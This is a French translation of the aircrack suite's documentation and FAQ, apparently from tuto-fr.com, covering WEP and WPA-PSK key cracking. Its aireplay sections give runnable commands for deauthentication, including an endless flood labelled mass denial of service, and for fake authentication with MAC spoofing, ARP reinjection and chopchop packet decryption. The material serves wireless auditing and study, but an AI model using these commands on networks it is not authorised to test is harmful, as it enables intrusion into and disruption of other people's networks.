Vous êtes sur la page 1sur 49

Documentation de aircrack

Présentation

Qu'est ce que aircrack ?


Comment craquer une clef wep statique ?
Combien de IVs sont necessaires pour cracker une clef WEP ?
Télécharer troppix 1.0, 1.1 et 1.2

Installation (win32)

J'ai le message "cygwin1.dll not found" lors du lancement de aircrack.exe.


Pourquoi n'existe-t-il pas de version d'airplay pour windows ?
Les drivers peek ne reconnaissent pas ma carte.

Airodump

Comment utiliser airodump sous Windows ?


Quelle est la signification des champs affichés par airodump ?
Pourquoi je ne parviens pas à compiller airodump et aireplay sur BSD / Mac OS X ?
Comment utiliser airodump sous linux ?
Airodump ne cesse de balancer entre WEP et WPA
Il semble que je ne capture aucuns IVs !
Comment fusionner plusieurs fichiers de capture?

Aireplay

Comment utiliser aireplay ?

Attack 0: deauthentication
Attaque 1: fake authentication
Attaque 2: interactive packet replay
Attaque 3: ARP-request reinjection
Attaque 4: KoreK's "chopchop" (prédiction CRC)

Attaque sans stations connectés (replay whithout clients)

Aircrack

Comment utiliser aircrack ?


J'ai plus d'un millions de IVs mais aircrack ne trouve pas la clef !
Pouvez vous rajouter une fonction de reprise dans aircrack ?

Materiel

Ma carte est-elle compatible avec airodump / aireplay ?


Quelle est la meilleur carte a acheter?

Firmewares / pilotes

Comment mettre à jour mon firmware Prism2 ?


Comment mettre à jour les pilotes pour l'injection avec aireplay ?

Installer le pilote driver madwifi (cartes Atheros)


Installation des pilotes / drivers prism54 (Cartes PrismGT FullMAC)
Installation des pilotes / drivers HostAP (Cartes Prism2)
Installation des pilotes / drivers wlan-ng (Cartes Prism2)
Installation des pilotes / drivers r8180-sa2400 (Cartes RTL8180)
Installation des pilotes / drivers rt2500 (Ralink b/g PCI/CardBus)
Installation des pilotes / drivers rt2570 (Ralink b/g USB)
Le driver ne se compile pas.
Je possède une carte Prism2, mais airodump / aireplay ne semblent pas fonctionner!
Je possede une carte Atheros, et le patch madwifi fait planter le kernel /
aireplay continue de me dire que le support amélioré du RTC n'est pas disponible

WPA

Comment puis-je craquer un reseau WPA-PSK ?


WZCOOK retrouve-t-il les clefs WPA ?
Le WPA va-t-il être cracker dans le futur ?

Autres

Comment fusionner plusieurs fichiers de capture?


Comment savoir si ma clef WEP est correcte ?
Pas moyen de cracker cet AP !
Comment retrouver mes clef wep sous Windows ?
Comment puis-je changer l'adresse mac de ma carte?
Puis-je utiliser Ethereal pour capturer des paquets 802.11?
Ethereal peut-il decoder les paquets de données WEP ?
J'ai trouver la clef, comment decrypter le fichier de capture ?

Qu'est ce que aircrack ?


aircrack est une serie d'outils de monitoring pour reseaux sans fil :

● airodump: 802.11 programme de capture de paquets


● aireplay: 802.11 programme d'injection de paquets
● aircrack: crackeur de clef wep statiques et WPA-PSK
● airdecap: decrypte les fichiers WEP/WPA capturés

Comment puis je cracker une clef wep statique ?


L'idée de base est de capturer le plus possible de traffic crypté avec airodump. Chaque paquet
crypté avec une clef WEP est associé à un vecteur d'initialisation (IV) de 3 bytes: apres avoir collecté
un nombre suffisant de paquets de données , lancez aircrack sur le fichier de capture. Aircrack va
alor effectué un ensemble d'attaques statistiques developpées par un hacker talentueux nommé
KoreK.

Combien de IVs sont necessaires pour cracker une clef WEP ?


Le craquage de clef WEP n'est pas une science exacte. Le nombre de IVs necessaires depend de la
longueure de la clef et aussi de votre chance. Habituellement ,les clef WEP¨40-bit peuvent etre
craquées avec 300 000 IVs, les 104-bit avec 1.000.000 IVs; Si vous n'avez pas de chance vous
pouriez avoir besoin de 2 millions de IVs ou plus.

Il n'y a aucune manière de connaitre la longueure de la clef: cette information est maintenue cachée
et jamais dévoilée; En consequence , airodump ne peut pas indiquer la longueure de la clef WEP.
Ainsi il est recommandé de lancer aircrack 2 fois: lorsque vous avez 250.000 IVs, lancez aircrack
avec le parametre "-n 64" pour cracker une clef WEP 40-bit. Ensuite si la clef n'est pas trouvée,
relancez aircrack (sans l'option -n) pour cracker une clef WEP 104-bit.
Télécharger troppix 1.0 et 1.2

Christophe Devine a arréter le devloppement de la suite aircrack mais aussi de troppix, la meilleure distribution
live cd niveau compatibilité materiel wifi :'(.

Voici donc quelques liens pour télécharger troppix

● http://distrowatch.com/
● http://www.idg.pl
● http://de3.mirrors.flosoft.biz/

Vous pouvez également consulter ce sujet pour annoncer de nouveaux liens ou autres:

forum.tuto-fr.com/

J'ai le message "cygwin1.dll not found" lors du lancement de aircrack.


exe.
Vous pouvez telecharger cette bibliotheque ici : cygmin1.dll

Pour utiliser aircrack, glissez deposez vos fichiers de capture .cap ou .ivs sur aircrack.exe. Si vous
souhaitez configurer les options, vous devez lancer une invite de commande (cmd.exe) et entrer
manuellement les lignes de commandes; il y a également une interface graphique pour aircrack,
developée par hexanium.

Exemple:

C:\TEMP> aircrack.exe -n 64 -f 8 out1.cap out2.cap ...

Voir ici pour liste des options.

Pouquoi n'existe-t-il pas de version d'airplay pour windows ?


Les drivers PEEK ne supportent pas l'injection de paquets 802.11;
Il y a cependant des alternatives commerciales :

Cartes Prism : http://www.tuca-software.com/transmit.php

Cartes Atheros: http://www.tamos.com/htmlhelp/commwifi/pgen.htm

Les drivers peek ne reconnaissent pas ma carte.


Certaines cartes ne sont pas reconnues par les pilotes Windows, malgré qu'elles possèdent le bon
chipset. Dans ce cas, ouvrez le gestionnaire de péripheriques, selectionnez votre carte puis "Mettre à
jour le driver", selectionnez "Installer à partir d'une liste ou d'un emplacement spécifié",
selectionnez "Ne pas chercher je vais choisir le pilote à installer ", cliquez sur "Disque fournit",
indiquez le chemin ou vous avez dézippé le pilote, désélectionner "Montrez moi le materiel
compatible", et enfin choisissez le pilote.
Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Comment utiliser airodump sous Windows ?
Premièrement assurez vous d'avoir installer le bon pilote et vérifiez la compatibilité de votre carte
(voir le tableau).

Lors de l'utilisation de airodump, vous devez spécifier:

● Le numéro de l'interface reseau que vous devez choisir dans la liste donnée par airodump.
● Le type d'interface reseau ('o' Pour HermesI et Realtek, 'a' pour Aironet, Atheros, Broadcom et
PrismGT).
● Le numéro de canal, compris entre 1 et 14. Vous pouvez également spécifier 0 pour tous les
sélectionner.
● Le préfixe des fichiers de sortie. Par exemple, si le préfixe est "foo", airodump va creer un
fichier foo.cap (paquets capturés) et foo.txt (statistiques CSV). Si le fichier foo.cap existe déja,
airodump reprendra la session de capture en ajoutant les paquets à la précédente.
● Le choix "uniquement les IVs". Mettez 1 si vous souhaitez sauvegarder que les IVs provenat
des paquets de données WEP. Ceci permet d'obtenir un fichier beaucoup moin volumineux
mais le fichier de sortie (foo.ivs) ne pourra être utiliser que pour le crack de la clef wep.

Pour arreter la capture de paquet, appuyer sur Ctrl+C. Il est probable que vous obteniez un ecran
bleu, ceci est imputable à un bug des pilotes Peek qui ne quite pas correctement le mode monitor.
La cause de ce bug reste inconnue.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 45 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Quelle est la signification des champs affichés par airodump ?
Airodump va afficher une liste des points d'accès détectés et également une liste des client
connectés ("stations"). Voici un exemple effectué avec une carte Prism2 et HostAP:

BSSID PWR Beacons # Data CH MB ENC ESSID

00:13:10:30:24:9C 46 15 3416 6 54. WEP le


ssid
00:09:5B:1F:44:10 36 54 0 11 11 OPN NETGEAR

BSSID STATION PWR Packets Probes

00:13:10:30:24:9C 00:09:5B:EB:C5:2B 48 719 le ssid


00:13:10:30:24:9C 00:02:2D:C1:5D:1F 190 17 le ssid

Champ Description
BSSID Adresse MAC du point d'accès.
Niveau du signal indiqué par la carte. Sa signification depend du driver, mais
PWR plus le signal est haut plus vous êtes rapproché de l'AP. Si PWR == -1, le pilote
ne supporte pas l'indication de niveau de puissance.
Nombre de paquets d'annonce envoyé par l'AP. Chaque AP envoit environ dix
Beacons paquets par seconde au plus bas taux (1M), ainsi ils peuvent habituellement
être récoltés de très de loin.
Nombre de paquets de donneés capturés (si WEP, compte unique de IV),
# Data
incluant les paquets d'annonce (broadcast packets).
Numéro de canal (tiré des beacon packets). Note: parfois des paquets d'autres
CH canaux sont capturés malgré que airodump ne soit pas configuré pour les
recevoir. Ceci à cause d'interferences radio.
Vitesse maximum supportée par AP. Si mb = 11, il s'agit de 802.11b, si mb =
MB 22 il s'agit de 802.11b+ et les taux plus élevés sont du 802.11g. Le point
(après 54 ci-dessus) indique que le préambule court est supporté.
Algorithme d'encription utilisé. OPN = pas d'encryption, "WEP?" = WEP ou plus
(pas assez de données pour choisir entre WEP et WPA), WEP (sans le point
ENC
d'interrogation) indique du WEP statique ou dynamique, et WPA si TKIP ou
CCMP est détecté.
Aussi nommé "SSID", il peut être vide si sa diffusion est désactivée. Dans ce
ESSID cas, airodump essayera de récupérer le SSID à partir des reponses de sondes
(probe responses) et des demandes d'association.
Adresse MAC de chacune des station connectées. Dans l'exemple deux client
STATION
ont été détectés (00:09:5B:EB:C5:2B et 00:02:2D:C1:5D:1F).

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 45 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, voir l'original de cette pagetutos


ici
et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Pourquoi je ne parviens pas à compiller airodump et aireplay sur BSD /
Mac OS X ?
Les sources de chacun sont spécifiques a linux. Il n'y a pas de projet visant a les porter sur un autre
système d'exploitation.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 45 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Comment utiliser airodump sous linux ?
Avant de démarrer airodump, vous lancer le script airmon.sh pour lister les differentes interfaces
wifi détectés. Il est possible, bien que non recommandé, de lancer à la fois Kismet et airodump.

usage: airodump <interface> <préfixe de sortie> [canal] [choix IVs]

Specifiez le canal 0 pour sélétionner tous les canaux de 2.4GHz.


Mettez 1 pour le choix des IVs si vous souhaitez sauvegarder que les IVs
Ceci permet d'obtenir un fichier il ne pourra être utiliser que pour le crack de
la clef wep.

Si le client gpsd est lancé, airodump trouvera et sauvegardera les coordonnés


GPS en cour dans un fichier text.

Vous pouvez convertir un fichier .cap / .dump en un fichier .ivs en utilisant le programme pcap2ivs
(linux uniquement).

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 45 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, voir l'original de cette pagetutos


ici
et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Airodump ne cesse de balancer entre WEP et WPA
Ceci se produit car votre pilote ne reconnait pas les paquets corrompus (dont le CRC est invalide). Si
il s'agit d'une centrino b, on ne peut rien faire; allez acheter une meilleure carte. Si s'est une Prism2
essayez de mettre à jour le firmware.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 45 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Comment fusionner plusieurs fichiers de capture?
Vous pouvez utiliser le programme mergecap (partie du pack commun d'ethereal ou de la
distribution win32):

mergecap -w sortie.cap test1.cap test2.cap test3.cap

Les fichiers .ivs peuvent etre assemblés avec le programme "mergeivs" (linux uniquement).

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 45 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Comment mettre à jour les pilotes pour l'injection avec aireplay ?

Drivers Madwifi, Prism54, HostAP, Wlan-ng, r8180-sa2400, Rt2500, Rt2700

Pour le moment, l'injection de paquet avec aireplay est supportée uniquement sur les Prism2,
PrismGT (FullMAC), Atheros, RTL8180 et Ralink. L'injection sur Centrino, Hermes, ACX1xx,
Aironet, ZyDAS, Marvell and Broadcom n'est pas supporté en raison des firmwares ou des
limitations des pilotes.

L'injection sur Prism2 et Atheros reste encor très experimentale; Si votre carte semble ne rien faire
(pas de paquets capturés ou injectés), désactivez l'interface, relancer les pilotes et reconnecter la
carte. Considérez également la mise à jour du firmware (si Prism2).

Tous les pilotes doivent être mis à jour pour supporter l'injection en mode Monitor. Vous aurez
besoin des en-tetes linux qui vous indiquerons la version de votre noyau; sinon, vous devrez
télécharger les sources de linux et vous compiler un noyau personalisé.

Si vous vous éprouvez des problèmes, vous pouvez utiliser le LiveCD Troppix , qui inclue les mise à
jours périphériques.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 45 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Comment utiliser aireplay ?
Si le pilote est correctement mis à jour, aireplay est capable d'injecter des paquets 802.11 en mode
monitor; il ya actuellement 5 attaques différentes.

Si vous obtenez "ioctl(SIOCGIFINDEX) failed: No such device", vérifiez que le nom de votre
périphérique soit correct et que vous n'avez pas oubliez de paramètres dans la ligne de commande.

Dans les exemples suivant , 00:13:10:30:24:9C est l'adresse MAC du point d'acces (sur le canal 6),
et 00:09:5B:EB:C5:2B est l'adresse MAC d'un client (connecté en wifi).

Desauthentification, Fake authentication, Interactive paquet replay, ARP request injection, Korek chop-chop

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 45 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Attack 0: deauthentication
Attaque par desauthentification
Cette attaque est extremement utile pour retrouver un ESSDI caché (not broadcasted) et pour la capture de
handshakes WPA en forçant le client à se réauthentifier. On peut aussi s'en servir pour générer des requetes
ARP car les clients Windows vident parfois leur cache ARP quand ils sont déconnectés. Biensur cette attaque est
totalement inutile si il n'y a pas de client wifi associés.

Dans les exemples suivant , 00:13:10:30:24:9C est l'adresse MAC du point d'acces (sur le canal 6), et
00:09:5B:EB:C5:2B est l'adresse MAC d'un client (connecté en wifi).

Il peut etre utile de cibler une station spécifique en utilisant le paraètre -c.

Exemples:

@ MAC de l'AP (canal 6):00:13:10:30:24:9C


@ MAc du client wifi: 00:09:5B:EB:C5:2B

● Capture d'Handshake WPA avec une Atheros

airmon.sh start ath0


airodump ath0 out 6 (basculez dans une autre console)
aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
(attendez quelques secondes)
aircrack -w /path/to/dictionary out.cap

● Demande de génération d'ARP avec une carte Prism2

airmon.sh start wlan0


airodump wlan0 out 6 (basculez dans une autre console)
aireplay -0 10 -a 00:13:10:30:24:9C wlan0
aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

Apres avoir envoyer les 5 series de paquets de desauthentification, on commence à capturer les requetes
ARP avec l'attaque 3. L'option -h est obligatoire et doit être l'adresse MAC d'un client associé.

Si le pilote est wlan-ng, vous devez lancer le script airmon.sh ; sinon la carte ne sera pas correctement
configurée pour l'injection.

● Denis de service en masse avec une carte RT2500

airmon.sh start ra0


aireplay -0 0 -a 00:13:10:30:24:9C ra0

Avec le parametre 0, cette attaque va recommencer indefiniement à envoyer des paquets de


desauthentification à l'adresse d'emission, empechant ainsi aux clients de rester connectés.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 44 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Attaque 1: fake authentication
Attaque par fausse authentification

Les autres attaques: Desauthentification, Fake authentication, Interactive paquet replay, ARP request injection,
Korek chop-chop

Cette attaque est seulement utile lorsque vous avez besoin d'une adresse MAC associée pour les attaques 2, 3,
4 (option -h) et qu'il n'y a pas de client associés pour le moment. Il est recommandé d'utilisé l'adresse
MAc d'un client réel (par exemple, 00:09:5B:EB:C5:2B)dans les attaques 2, 3 et 4. L'attaque fake
authentication ne génère PAS de requetes ARP.

En outre, les attaques suivantes s'exécuteront probablement mieux si vous mettez à jour l'adresse MAC de la
carte, de sorte qu'elle envoie correctement les ACKs :

@ MAC de l'AP (canal 6):00:13:10:30:24:9C


@ MAc du client wifi: 00:09:5B:EB:C5:2B

ifconfig ath0 down


ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

aireplay -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0


12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)

Avec madwifi CVS 2005-08-14 mis à jour, il est possible d'injecter des aquets en mode Managed (la clef wep
elle meme importe peut tant que l'AP accepte les authetifications Open-System).

ifconfig ath0 down hw ether 00:11:22:33:44:55


iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
ifconfig ath0 up

sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump ath0raw out 6

Ensuite vous pouvez lancer les attaques 3 ou 4 (aireplay va remplacer automatiquement ath0 par ath0raw
dans ce qui suit):

aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0


aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0

Certains AP requièrent de s'associer toutes les 30 secondes, autrement le client est considéré comme
déconnecté. Dans ce cas mettez en place une réauthentification periodique:

aireplay -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Si cette attaque semble mal se dérouler (aireplay ne s'arrete pas d'envoyer des requetes d'authentification), un
filtrage d'adresse MAC doit être en place. Assurez vous que:

● Vous n'êtes pas trop loin du point d'acces.


● Le pilotes soient correctement installés et mis à jour.
● La carte est configurée sur le meme canal que l'AP.
● Les BSSID et ESSID (-a / -e options) sont corrects.
● Si il s'agit de Prism2 assurez vous d'avoir les firmwares mis à jour.

Rappel:L'injection sur Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell et Broadcom n'est pas
supporté a cause des firmwares ou des limitations des pilotes.
Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 44 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Attaque 2: interactive packet replay
Reinjection selective de paquets

Les autres attaques: Desauthentification, Fake authentication, Interactive paquet replay, ARP request injection,
Korek chop-chop

Cette attaque vous autorise à choisir un paquet particulier pour etre répété; cela produit parfois de meilleurs
resultats que l'attaque 3 (injection automatique d'ARP).

Vous pouvez par exemple l'utiliser pour tenter l'attaque "any data re-broadcast", qui ne fonctionne actuellement
que si l'Ap réencrypte les paquets de données:

@ MAC de l'AP (canal 6):00:13:10:30:24:9C


@ MAc du client wifi: 00:09:5B:EB:C5:2B

aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \


-h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

Vous pouvez aussi utilisez l'attaque 2 pour renvoyer manuellement des requetes ARP cryptées en WEP, dont la
taille et soit 68 soit 86 bytes (suivant le système d'expoitation):

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \


-m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \


-m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 43 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Attaque 3: ARP-request reinjection
Réinjection de requetes ARP

Les autres attaques: Desauthentification, Fake authentication, Interactive paquet replay, ARP request injection,
Korek chop-chop

L'attaque classique de réinjection de requetes ARP est la plus efficace pour produire de nouveaux IVs et
fonctionne très bien. Vous avez besoin soit de l'adresse MAC d'un client associé (00:09:5B:EB:C5:2B), soit une
fausse adresse MAC provennat de l'attaque 1 (00:11:22:33:44:55). Il est probable que vous deviez patienter
une durée temps plus ou moin longue avant qu'une requetes ARP ne se montre.; cette attaque échouera si il
n'y a pas de traffic.

Notez bien que vous pouvez réutilisé les ARP précedement capturé avec le parametre -r.

aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0


Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

@ MAC de l'AP (canal 6):00:13:10:30:24:9C


@ MAc du client wifi: 00:09:5B:EB:C5:2B

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 43 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Attaque 4: KoreK's "chopchop" (prédiction CRC)

Les autres attaques: Desauthentification, Fake authentication, Interactive paquet replay, ARP request injection,
Korek chop-chop

Cette attaques, lorsqu'elle fonctionne, peut décrypter un paquet WEP sans en connaitre la clef. Elle peut même
fonctionner contre une WEP dynamique. Cette attaque ne récupère pas la clef WEP elle-même, mais indique
simplement le plaintext. Cependant, la plupart des points d'accès ne sont pas vulnérables. Certains peuvent
sembler vulnérables d'abord mais actuellement les paquets de données sont plus petits que 60 bytes. Cette
attaque exige au moins un paquet de données de WEP.

@ MAC de l'AP (canal 6):00:13:10:30:24:9C


@ MAc du client wifi: 00:09:5B:EB:C5:2B

1. Premierement on decrypte le paquet:

aireplay -4 -h 00:09:5B:EB:C5:2B ath0

2. Regardons l'adresse IP :

tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Ensuite forgeons une requete ARP.

L'adresse IP source (192.168.1.100) importe peu, mais celle de destination (192.168.1.2) doit
correspondre aux requetes ARP. L'adresse MAc de la souce doit appartenir a une station associée.

./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \


00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

4. Et envoyons notre requete ARP:

aireplay -2 -r arp.cap ath0

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 43 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto tutos
et publiez les sur le site !
● A venir Injection de paquets sans client connectés
● Vidéos
retour a l'index de la doc
● Forum
● Chat irc
Pour vous éclairer, rien de mieux qu'une bonne vidéo:
● A propos Injection de paquets sans stations

Je previent de suite: Cette methode est aléatoire et ne fonctionne pas sur tout les AP !!!

Explication brève de la vidéo:

On lance airodump. Puis il lance une attaque -1 qui va faire apparaitre la station utilisée dans cette attaque
dans airodump (avec un paramètre de temps pour que l'authentification se fasse tout les tant).
Ensuite on (fenètre du bas) lance une requete -3 pour choper un ARP une fois que la station est apparue dans
airodump. Il faut bien laisser l'authentification tourner.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 43 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Comment utiliser aircrack ?
Utilisation: aircrack [options] <fichier(s) capturé(s)>

Vous pouvez spécifier plusieurs fichiers d'entrée (en format .ivs ou .cap). En outre, vous pouvez
lancer airodump et aircrack en même temps : aircrack mettra à jour automatiquement quand de
nouveaux IVs seront disponibles.

Voici un sommaire de toutes les options disponibles:

Option Param. Description


-a amode Mode d'attaque (1 = statique WEP, 2 = WPA-PSK).
Si indiqueé, tout les IVs possedant le meme SSID seront utilisés. Cette
-e essid option est indispensable pour le crack du WPA-PSK si le ESSID n'est pas
difusé.
-b bssid Selection du reseau cible à partir de l'adresse MAC de l'Ap.
-p nbcpu Sur les systemes SMP, indiquez le nombre de CPU.
Activation du mode silence (aucun affichage jusqu'a ce que la clef soit
-q none
trouvée pou non).
(WEP crack) Reduire le champ de recherche aux caractères alpha-
-c none
numerique uniquement(0x20 - 0x7F).
(WEP crack) Reduire le champ de recherche aux caractères binaires
-t none
decimaux hex.
(WEP crack) Indique le début de la clef WEP (en hex), en vue d'un
-d start
debuggage
(WEP crack) Adresse MAC à filtrer dans les paquets de données WEP.
-m maddr Vous pouvez specifier -m ff:ff:ff:ff:ff:ff pour utiliser tout les IVs,
indépendamment du reseau.
(WEP crack) Specifiez la longueur de la clef: 64 pour 40-bit WEP, 128
-n nbits
pour 104-bit WEP, etc. La valeure par defaut est 128.
(WEP crack) Conserve uniquement les IVs ayant cet index de clef (1 à
-i index
4). Par defaut l'index de clef est ignoré.
(WEP crack) Par defaut, ce paramètre est reglé à 2 pour une clef WEP a
104-bit et à 5 pour une de 40-bit. Spécifier une valeure plus grande
-f fudge
pour augmenter le niveau de bruteforce: Le crack sera plus long mais
aura également de plus grandes chances de succès
(WEP crack) Il y a 17 attaques statistique de Korek. Parfois, une
attaque crée des erreurs empéchant de trouver la clé marlgré un
-k korek
nombre important de IVs. Essayez -k 1, -k 2, ... -k 17 pour sélectionner
chaque attaque à désactiver.
-x none (WEP crack) Active le bruteforce pour les 2 derniers byts de la clef.
(WEP crack) Ceci est une simple attaque brutforce experimentale que
-y none vous pouvez utiliser si l'attaque standard ne fonctionnait pas malgré
plus d'un million de IVs.
-w words (WPA crack) Chemin vers un dictionnaire

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0
Il y a actuellement 43 visiteur(s) connecté(s) !
Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

J'ai plus d'un millions de IVs mais aircrack ne trouve pas la clef !
Raisons possibles:

● Pas de chance : Vous devez capturer plus de IVs. Habituellement une clef WEP104-bit se
craque avec un million de IVs mais parfois il en faut plus.

● Si tous les votes semblent identiques, alor le fichier de capture est corrompu ou la clef n'est
pas statique (EAP/802.1X utilisé ?).

● Un "false positive" à empecher de trouver la clef. Essayez de désactiver chaque attaque korek
(-k 1 .. 17), augmentez le fudge factor (-f) ou essayer l'attaque experimentale (-x / -y).

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 43 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Pouvez vous rajouter une fonction de reprise dans aircrack ?
Il n'y a rien de prevu en ce sens pour le moment.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 45 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, voir l'original de cette pagetutos


ici
et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Ma carte est-elle compatible avec airodump / aireplay ?
Voir ici une liste de cartes compatibles aircrack et ici

